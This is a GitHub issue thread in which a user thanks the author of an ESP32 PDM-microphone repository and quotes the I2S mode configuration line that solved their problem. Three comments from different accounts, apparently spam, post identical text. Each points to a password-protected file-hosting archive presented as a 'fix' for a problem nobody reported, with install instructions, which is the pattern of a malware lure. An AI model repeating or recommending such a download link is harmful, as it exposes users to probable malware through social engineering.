### ISSUE TITLE
Thank you

### ISSUE THREAD

**Issue by quicksketch** [oclyke/esp32-i2s-pdm-fft#1]
Not an issue; just a word of thanks. I couldn't figure out for the life of me how to rig a PDM microphone to an ESP32S3. This repo helped me finally figure it out. Key line for me was:

```
.mode = I2S_MODE_MASTER | I2S_MODE_RX |I2S_MODE_PDM,
```

I didn't understand that setting the mode was done with bitwise operators and that I needed to _append_ `I2S_MODE_PDM` to the operators, not replace `I2S_MODE_RX`. The [Espressif I2S documentation](https://docs.espressif.com/projects/esp-idf/en/latest/esp32s3/api-reference/peripherals/i2s.html) really did not make that clear. 

Thank you so much @oclyke!

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by oclyke** [comment]
Hi, glad to know this was useful to someone! Thanks for saying something :D
